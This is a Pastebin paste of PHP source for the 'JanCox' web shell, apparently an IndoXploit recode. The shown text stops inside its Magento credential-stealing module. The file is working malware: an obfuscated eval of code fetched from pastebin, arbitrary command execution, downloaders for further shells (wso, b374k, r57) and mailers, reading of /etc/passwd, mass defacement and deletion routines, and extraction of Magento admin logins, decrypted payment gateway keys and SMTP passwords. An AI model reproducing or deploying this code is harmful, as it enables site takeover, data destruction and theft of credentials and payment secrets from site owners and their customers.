0xspade

JonCox Shell

Sep 18th, 2016
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 223.38 KB | None | 0 0
  1. <?php
  2. //Jancox Shell
  3. //IndoXploit Shell V1 Recoded By 0x1999
  4. //default password nya "jancox"
  5. //Tutornya Cari Di Blog http://cr1p.blogspot.com
  6. @session_start();
  7. @error_reporting(0);
  8. @error_log(0);
  9. @ini_set('error_log',NULL);
  10. @ini_set('log_errors',0);
  11. @ini_set('max_execution_time',0);
  12. @ini_set('output_buffering',0);
  13. @ini_set('display_errors', 0);
  14. @set_time_limit(0);
  15. @set_magic_quotes_runtime(0);
  16. $lol="45641e46f614125065559617b3efc5a2"; //password(md5)
  17. function printLogin() {
  18.     ?>
  19. <html>
  20. <head>
  21. <title>JanCox</title>
  22. <link href='http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&path-prefix=es' rel='icon' type='image/x-icon'/>
  23. <meta name='author' content='0x1999'>
  24. <meta charset="UTF-8">
  25. <style type='text/css'>
  26. @import url(https://fonts.googleapis.com/css?family=Abel);
  27. html {
  28.     background: #000000;
  29.     color: #ffffff;
  30.     font-family: 'Abel';
  31.     font-size: 13px;
  32.     width: 100%;
  33. }
  34. input[type=text], input[type=password],input[type=submit] {
  35.     background: transparent;
  36.     color: #ffffff;
  37.     border: 1px solid #ffffff;
  38.     margin: 5px auto;
  39.     padding-left: 5px;
  40.     font-family: 'Abel';
  41.     font-size: 13px;
  42. }
  43. </style>
  44. </head>
  45.     <style>
  46.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  47.     </style>
  48.     <center>  
  49.     <form method=post>
  50.     <input type=password name=jancox>
  51.     </form></center>
  52.     <?php
  53.     eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
  54.     exit;
  55. }
  56. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  57.     if( empty( $lol ) ||
  58.         ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
  59.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  60.     else
  61.         printLogin();
  62. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  63.     @ob_clean();
  64.     $file = $_GET['file'];
  65.     header('Content-Description: File Transfer');
  66.     header('Content-Type: application/octet-stream');
  67.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  68.     header('Expires: 0');
  69.     header('Cache-Control: must-revalidate');
  70.     header('Pragma: public');
  71.     header('Content-Length: ' . filesize($file));
  72.     readfile($file);
  73.     exit;
  74. }  
  75.    
  76. ?>
  77. <html>
  78. <head>
  79. <title>JanCox</title>
  80. <link href='http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&path-prefix=es' rel='icon' type='image/x-icon'/>
  81. <meta name='author' content='IndoXploit'>
  82. <meta charset="UTF-8">
  83. <style type='text/css'>
  84. @import url(https://fonts.googleapis.com/css?family=Abel);
  85. html {
  86.     background: #000000;
  87.     color: #ffffff;
  88.     font-family: 'Abel';
  89.     font-size: 13px;
  90.     width: 100%;
  91. }
  92. li {
  93.     display: inline;
  94.     margin: 5px;
  95.     padding: 5px;
  96. }
  97. table, th, td {
  98.     border-collapse:collapse;
  99.     font-family: Tahoma, Geneva, sans-serif;
  100.     background: transparent;
  101.     font-family: 'Abel';
  102.     font-size: 13px;
  103. }
  104. .table_home, .th_home, .td_home {
  105.     border: 1px solid #ffffff;
  106. }
  107. th {
  108.     padding: 10px;
  109. }
  110. a {
  111.     color: #ffffff;
  112.     text-decoration: none;
  113. }
  114. a:hover {
  115.     color: gold;
  116.     text-decoration: underline;
  117. }
  118. b {
  119.     color: gold;
  120. }
  121. input[type=text], input[type=password],input[type=submit] {
  122.     background: transparent;
  123.     color: #ffffff;
  124.     border: 1px solid #ffffff;
  125.     margin: 5px auto;
  126.     padding-left: 5px;
  127.     font-family: 'Abel';
  128.     font-size: 13px;
  129. }
  130. textarea {
  131.     border: 1px solid #ffffff;
  132.     width: 100%;
  133.     height: 400px;
  134.     padding-left: 5px;
  135.     margin: 10px auto;
  136.     resize: none;
  137.     background: transparent;
  138.     color: #ffffff;
  139.     font-family: 'Abel';
  140.     font-size: 13px;
  141. }
  142. select {
  143.     background: transparent;
  144.     color: #ffffff;
  145.     border: 1px solid #ffffff;
  146.     margin: 5px auto;
  147.     padding-left: 5px;
  148.     font-family: 'Abel';
  149.     font-size: 13px;
  150. }
  151. .but {
  152.     background: transparent;
  153.     color: #ffffff;
  154.     border: 1px solid #ffffff;
  155.     margin: 5px auto;
  156.     padding-left: 5px;
  157.     font-family: 'Abel';
  158.     font-size: 13px;
  159. }
  160. </style>
  161. </head>
  162. <?php
  163. if (file_exists("php.ini")){
  164. }else{
  165. $img = fopen('php.ini', 'w');
  166. $sec = "safe_mode = OFF
  167. disable_funtions = NONE";
  168. fwrite($img ,$sec);
  169. fclose($img);}     
  170. function w($dir,$perm) {
  171.     if(!is_writable($dir)) {
  172.         return "<font color=red>".$perm."</font>";
  173.     } else {
  174.         return "<font color=lime>".$perm."</font>";
  175.     }
  176. }
  177.     function UrlLoop($url,$type){
  178.  
  179.         $urlArray = array();
  180.  
  181.         $ch = curl_init();
  182.         curl_setopt($ch, CURLOPT_URL, $url);
  183.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  184.         $result = curl_exec($ch);
  185.  
  186.         $regex='|<a.*?href="(.*?)"|';
  187.         preg_match_all($regex,$result,$parts);
  188.         $links=$parts[1];
  189.         foreach($links as $link){
  190.             array_push($urlArray, $link);
  191.         }
  192.         curl_close($ch);
  193.  
  194.         foreach($urlArray as $value){
  195.             $lol="$url$value";
  196.             if(preg_match("#$type#is", $lol)) {
  197.                 echo "$lol\r\n";
  198.             }
  199.         }
  200.     }
  201. function exe($cmd) {    
  202. if(function_exists('system')) {        
  203.         @ob_start();       
  204.         @system($cmd);     
  205.         $buff = @ob_get_contents();        
  206.         @ob_end_clean();       
  207.         return $buff;  
  208.     } elseif(function_exists('exec')) {        
  209.         @exec($cmd,$results);      
  210.         $buff = "";        
  211.         foreach($results as $result) {         
  212.             $buff .= $result;      
  213.         } return $buff;    
  214.     } elseif(function_exists('passthru')) {        
  215.         @ob_start();       
  216.         @passthru($cmd);       
  217.         $buff = @ob_get_contents();        
  218.         @ob_end_clean();       
  219.         return $buff;  
  220.     } elseif(function_exists('shell_exec')) {      
  221.         $buff = @shell_exec($cmd);     
  222.         return $buff;  
  223.     }
  224. }
  225. function perms($file){
  226. $perms = fileperms($file);
  227. if (($perms & 0xC000) == 0xC000) {
  228. $info = 's';
  229. } elseif (($perms & 0xA000) == 0xA000) {
  230. $info = 'l';
  231. } elseif (($perms & 0x8000) == 0x8000) {
  232. $info = '-';
  233. } elseif (($perms & 0x6000) == 0x6000) {
  234. $info = 'b';
  235. } elseif (($perms & 0x4000) == 0x4000) {
  236. $info = 'd';
  237. } elseif (($perms & 0x2000) == 0x2000) {
  238. $info = 'c';
  239. } elseif (($perms & 0x1000) == 0x1000) {
  240. $info = 'p';
  241. } else {
  242. $info = 'u';
  243. }
  244. $info .= (($perms & 0x0100) ? 'r' : '-');
  245. $info .= (($perms & 0x0080) ? 'w' : '-');
  246. $info .= (($perms & 0x0040) ?
  247. (($perms & 0x0800) ? 's' : 'x' ) :
  248. (($perms & 0x0800) ? 'S' : '-'));
  249. $info .= (($perms & 0x0020) ? 'r' : '-');
  250. $info .= (($perms & 0x0010) ? 'w' : '-');
  251. $info .= (($perms & 0x0008) ?
  252. (($perms & 0x0400) ? 's' : 'x' ) :
  253. (($perms & 0x0400) ? 'S' : '-'));
  254. $info .= (($perms & 0x0004) ? 'r' : '-');
  255. $info .= (($perms & 0x0002) ? 'w' : '-');
  256. $info .= (($perms & 0x0001) ?
  257. (($perms & 0x0200) ? 't' : 'x' ) :
  258. (($perms & 0x0200) ? 'T' : '-'));
  259. return $info;
  260. }
  261. function hdd($s) {
  262. if($s >= 1073741824)
  263. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  264. elseif($s >= 1048576)
  265. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  266. elseif($s >= 1024)
  267. return sprintf('%1.2f',$s / 1024 ) .' KB';
  268. else
  269. return $s .' B';
  270. }
  271. function ambilKata($param, $kata1, $kata2){
  272.     if(strpos($param, $kata1) === FALSE) return FALSE;
  273.     if(strpos($param, $kata2) === FALSE) return FALSE;
  274.     $start = strpos($param, $kata1) + strlen($kata1);
  275.     $end = strpos($param, $kata2, $start);
  276.     $return = substr($param, $start, $end - $start);
  277.     return $return;
  278. }
  279. if(get_magic_quotes_gpc()) {
  280.     function idx_ss($array) {
  281.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  282.     }
  283.     $_POST = idx_ss($_POST);
  284. }
  285. function CreateTools($names,$lokasi){
  286.     if ( $_GET['create'] == $names ){
  287.         $a= "".$_SERVER['SERVER_NAME']."";
  288. $b= dirname($_SERVER['PHP_SELF']);
  289. $c = "/cox_tools/".$names.".php";
  290. if (file_exists('cox_tools/'.$names.'.php')){
  291.     echo '<script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';
  292.     }
  293.     else {mkdir("cox_tools", 0777);
  294. file_put_contents('cox_tools/'.$names.'.php', file_get_contents($lokasi));
  295. echo ' <script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';}}}
  296.  
  297. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  298. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  299. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  300. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  301. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  302. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  303. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  304. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  305. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  306. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  307. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  308. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  309. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  310. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  311. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  312. if(isset($_GET['dir'])) {
  313.     $dir = $_GET['dir'];
  314.     chdir($_GET['dir']);
  315. } else {
  316.     $dir = getcwd();
  317. }
  318. $dir = str_replace("\\","/",$dir);
  319. $scdir = explode("/", $dir);
  320. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  321. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  322. $ds = @ini_get("disable_functions");
  323. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  324. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  325. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  326. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  327. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  328. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  329. if(!function_exists('posix_getegid')) {
  330.     $user = @get_current_user();
  331.     $uid = @getmyuid();
  332.     $gid = @getmygid();
  333.     $group = "?";
  334. } else {
  335.     $uid = @posix_getpwuid(posix_geteuid());
  336.     $gid = @posix_getgrgid(posix_getegid());
  337.     $user = $uid['name'];
  338.     $uid = $uid['uid'];
  339.     $group = $gid['name'];
  340.     $gid = $gid['gid'];
  341. }
  342. $d0mains = @file("/etc/named.conf");
  343.             $users=@file('/etc/passwd');
  344.         if($d0mains)
  345.         {
  346.             $count;  
  347.             foreach($d0mains as $d0main)
  348.             {
  349.                 if(@ereg("zone",$d0main))
  350.                 {
  351.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  352.                     flush();
  353.                     if(strlen(trim($domains[1][0])) > 2)
  354.                     {
  355.                         flush();
  356.                         $count++;
  357.                     }
  358.                 }
  359.             }
  360.         }
  361.  
  362. $sport=$_SERVER['SERVER_PORT'];
  363. echo "<table style='width:100%'>";
  364. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  365. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  366. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  367. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  368. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  369. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  370. echo "<tr><td>Safe Mode: $sm</td></tr>";
  371. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  372.  
  373. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  374. echo "<tr><td>Current DIR: ";
  375. foreach($scdir as $c_dir => $cdir) {   
  376.     echo "<a href='?dir=";
  377.     for($i = 0; $i <= $c_dir; $i++) {
  378.         echo $scdir[$i];
  379.         if($i != $c_dir) {
  380.         echo "/";
  381.         }
  382.     }
  383.     echo "'>$cdir</a>/";
  384. }
  385. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  386.     Command :
  387.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  388.     </form></td></tr>";
  389. echo "</table><hr>";
  390. echo "<center>";
  391. echo "<ul>";
  392. echo "<li>[ <a href='?'>Home</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  394. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  395. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  400. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  406. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  415. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  421. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  422. echo "</ul>";
  423. echo "</center>";
  424. echo "<hr>";
  425. if($_GET['do'] == 'upload') {
  426.     echo "<center>";
  427.     if($_POST['upload']) {
  428.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  429.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  430.         } else {
  431.             $act = "<font color=red>failed to upload file</font>";
  432.         }
  433.     }
  434.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  435.     echo $act;
  436.     echo "</center>";
  437. }
  438.  elseif($_GET['do'] == 'cmd') {
  439.     if($_POST['do_cmd']) {
  440.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  441.     }
  442. } elseif($_GET['do'] == 'mass_deface') {
  443.     echo "<center><form action=\"\" method=\"post\">\n";
  444.     $dirr=$_POST['d_dir'];
  445.     $index = $_POST["script"];
  446.     $index = str_replace('"',"'",$index);
  447.     $index = stripslashes($index);
  448.     function edit_file($file,$index){
  449.         if (is_writable($file)) {
  450.         clear_fill($file,$index);
  451.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  452.         }
  453.         else {
  454.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  455.             }
  456.             }
  457.     function hapus_massal($dir,$namafile) {
  458.         if(is_writable($dir)) {
  459.             $dira = scandir($dir);
  460.             foreach($dira as $dirb) {
  461.                 $dirc = "$dir/$dirb";
  462.                 $lokasi = $dirc.'/'.$namafile;
  463.                 if($dirb === '.') {
  464.                     if(file_exists("$dir/$namafile")) {
  465.                         unlink("$dir/$namafile");
  466.                     }
  467.                 } elseif($dirb === '..') {
  468.                     if(file_exists("".dirname($dir)."/$namafile")) {
  469.                         unlink("".dirname($dir)."/$namafile");
  470.                     }
  471.                 } else {
  472.                     if(is_dir($dirc)) {
  473.                         if(is_writable($dirc)) {
  474.                             if(file_exists($lokasi)) {
  475.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  476.                                 unlink($lokasi);
  477.                                 $idx = hapus_massal($dirc,$namafile);
  478.                             }
  479.                         }
  480.                     }
  481.                 }
  482.             }
  483.         }
  484.     }
  485.     function clear_fill($file,$index){
  486.         if(file_exists($file)){
  487.             $handle = fopen($file,'w');
  488.             fwrite($handle,'');
  489.             fwrite($handle,$index);
  490.             fclose($handle);  } }
  491.  
  492.     function gass(){
  493.         global $dirr , $index ;
  494.         chdir($dirr);
  495.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  496.         $files = scandir($dirr) ;
  497.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  498.         sort($files);
  499.         $n = 0 ;
  500.         foreach ($files as $file){
  501.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  502.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  503.                 edit_file($file,$index);
  504.                 flush();
  505.                 $n = $n +1 ;
  506.                 }
  507.                 }
  508.                 echo "<br>";
  509.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  510.                     }
  511.     function ListFiles($dirrall) {
  512.  
  513.     if($dh = opendir($dirrall)) {
  514.  
  515.        $files = Array();
  516.        $inner_files = Array();
  517.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  518.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  519.         while($file = readdir($dh)) {
  520.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  521.                 if(is_dir($dirrall . "/" . $file)) {
  522.                     $inner_files = ListFiles($dirrall . "/" . $file);
  523.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  524.                 } else {
  525.                     array_push($files, $dirrall . "/" . $file);
  526.                 }
  527.             }
  528.             }
  529.  
  530.             closedir($dh);
  531.             return $files;
  532.         }
  533.     }
  534.     function gass_all(){
  535.         global $index ;
  536.         $dirrall=$_POST['d_dir'];
  537.         foreach (ListFiles($dirrall) as $key=>$file){
  538.             $file = str_replace('//',"/",$file);
  539.             echo "<center><strong>$file</strong> ===>";
  540.             edit_file($file,$index);
  541.             flush();
  542.         }
  543.         $key = $key+1;
  544.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  545.     function sabun_massal($dir,$namafile,$isi_script) {
  546.         if(is_writable($dir)) {
  547.             $dira = scandir($dir);
  548.             foreach($dira as $dirb) {
  549.                 $dirc = "$dir/$dirb";
  550.                 $lokasi = $dirc.'/'.$namafile;
  551.                 if($dirb === '.') {
  552.                     file_put_contents($lokasi, $isi_script);
  553.                 } elseif($dirb === '..') {
  554.                     file_put_contents($lokasi, $isi_script);
  555.                 } else {
  556.                     if(is_dir($dirc)) {
  557.                         if(is_writable($dirc)) {
  558.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  559.                             file_put_contents($lokasi, $isi_script);
  560.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  561.                         }
  562.                     }
  563.                 }
  564.             }
  565.         }
  566.     }
  567.     if($_POST['mass'] == 'onedir') {
  568.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  569.         $ini="http://";
  570.         $mainpath=$_POST[d_dir];
  571.         $file=$_POST[d_file];
  572.         $dir=opendir("$mainpath");
  573.         $code=base64_encode($_POST[script]);
  574.         $indx=base64_decode($code);
  575.         while($row=readdir($dir)){
  576.         $start=@fopen("$row/$file","w+");
  577.         $finish=@fwrite($start,$indx);
  578.         if ($finish){
  579.             echo"$ini$row/$file\n";
  580.             }
  581.         }
  582.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  583.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  584.         $dir=opendir("$mainpath");
  585.         $code=base64_encode($_POST[script]);
  586.         $indx=base64_decode($code);
  587.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  588.         $finish=@fwrite($start,$indx);
  589.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  590.         }
  591.  
  592.     }
  593.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  594.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  595.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  596.     elseif($_POST['mass'] == 'massdeface') {
  597.         echo "<div style='margin: 5px auto; padding: 5px'>";
  598.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  599.         echo "</div>";  }
  600.     else {
  601.         echo "
  602.         <center><font style='text-decoration: underline;'>
  603.         Select Type:<br>
  604.         </font>
  605.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  606.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  607.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  608.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  609.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  610.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  611.         <font style='text-decoration: underline;'>Folder:</font><br>
  612.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  613.         <font style='text-decoration: underline;'>Filename:</font><br>
  614.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  615.         <font style='text-decoration: underline;'>Index File:</font><br>
  616.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  617.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  618.         </form></center>";
  619.         }
  620.     }
  621. elseif($_GET['do'] == 'magen') {
  622. echo'
  623. <div id="page-wrap">  
  624. <center>  
  625. <br>  
  626. <FORM action=""  method="post">  
  627. <div align="center">[M A G E N T O] - Stealing Information<br>  
  628. <div align="center">coder: sohai & n4KuLa_<br>  
  629. <input type="hidden" name="form_action" value="2">  
  630. </div>  
  631. </div>  
  632. ';  
  633.  
  634.  
  635. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
  636.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
  637.     if(isset($xml->global->resources->default_setup->connection)) {  
  638.        $connection = $xml->global->resources->default_setup->connection;  
  639.        $prefix = $xml->global->resources->db->table_prefix;  
  640.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
  641.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
  642.          
  643.        try {  
  644.            $app = Mage::app('default');  
  645.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
  646.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
  647.  
  648.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
  649.            print("Could not connect: " . mysql_error());  
  650.        }  
  651.        mysql_select_db($connection->dbname);  
  652.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
  653.  
  654.     $crypto = new Varien_Crypt_Mcrypt();  
  655.     $crypto->init($key);  
  656.  
  657.     //=========================================================================================================  
  658.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
  659.     if (!$query){  
  660.           echo "<center><b>Gagal</b></center>";  
  661.     }else{  
  662.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
  663.           echo'<br><br>  
  664.                ====================================================================<br>  
  665.                                [ Admin FROM website : '.$site['website'].'] <br>  
  666.                ====================================================================<br>';  
  667.     }  
  668.     echo "  
  669.    <table border='1' align='center' >  
  670.    <tr>  
  671.    <td>id</td>  
  672.    <td>firstname</td>  
  673.    <td>lastname</td>  
  674.    <td>email</td>  
  675.    <td>username</td>  
  676.    <td>password</td>  
  677.    </tr>";  
  678.         while($vx = mysql_fetch_array($query)) {  
  679.         $no = 1;  
  680.         $user_id = $vx['user_id'];  
  681.         $username = $vx['username'];  
  682.         $password = $vx['password'];  
  683.         $email = $vx['email'];  
  684.         $firstname = $vx['firstname'];  
  685.         $lastname = $vx['lastname'];  
  686.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
  687.         }  
  688.     echo "</table><br>";  
  689.     //=========================================================================================================  
  690.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
  691.     if(mysql_num_rows($query) != 0){  
  692.         if (!$query){  
  693.               echo "<center><b>Gagal</b></center>";  
  694.         }else{  
  695.               echo'<br><br>  
  696.                    ====================================================================<br>  
  697.                                    [ Authorizenet ] <br>  
  698.                    ====================================================================<br>';  
  699.         }  
  700.         echo "  
  701.        <table border='1' align='center' >  
  702.        <tr>  
  703.        <td>no</td>  
  704.        <td>user</td>  
  705.        <td>pass</td>      
  706.        </tr>";  
  707.             $no = 1;  
  708.             while($vx = mysql_fetch_array($query)) {  
  709.             $user = $crypto->decrypt($vx['user']);  
  710.             $pass = $crypto->decrypt($vx['pass']);  
  711.  
  712.              
  713.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  714.             $no++;  
  715.             }  
  716.         echo "</table><br>";  
  717.     }  
  718.     //=========================================================================================================  
  719.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
